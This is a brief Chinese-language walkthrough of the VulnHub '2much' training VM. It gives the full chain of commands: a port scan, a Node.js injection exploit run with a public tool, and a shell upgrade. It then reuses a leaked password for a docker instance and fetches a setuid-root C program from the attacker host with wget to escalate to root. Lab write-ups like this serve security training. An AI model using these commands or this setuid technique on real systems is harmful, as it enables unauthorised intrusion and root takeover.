今天實踐的是vulnhub的2much鏡像,

下載地址,https://download.vulnhub.com/2much/2much.tar.gz,

用virtualbox導入成功,

直接能看到靶機地址192.168.0.187,

繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,

8081端口上有node.js服務,

kali攻擊機上下載攻擊項目源碼,

git clone https://github.com/esmog/nodexp.git,開始攻擊,

python2 nodexp.py --url="http://192.168.0.187:8081/?name=[INJECT_HERE]",

獲取到shell,session -i 2,轉成交互式shell,

python -c 'import pty; pty.spawn("/bin/bash")',

在/home/4ndr34z/ftp目錄里查看tdl.txt文件,

獲取到密碼3236$fsdfzcv_cs,

查看歷史命令,發現這個密碼是用來登錄docker實例的,

登錄進去看看,ssh root@127.0.0.1 -p23,

看來docker實例是跟外面有文件共享的,

在kali攻擊機上做個攻擊腳本,

vim exploit.c

int main(void){

       setgid(0); setuid(0);

       execl("/bin/sh","sh",0);

}

再開個http下載服務,python2 -m SimpleHTTPServer,

在靶機上下載這個文件,

wget http://192.168.0.186:8000/exploit.c,

編譯成可執行文件,gcc exploit.c -o exploit,

再次登錄到docker實例中,

把看到的可執行文件拷貝到新文件,cp exploit poc,

給新的可執行文件修改權限,chmod 4755 poc,

再回到靶機,執行這個新的可執行文件,./poc,id確認是root,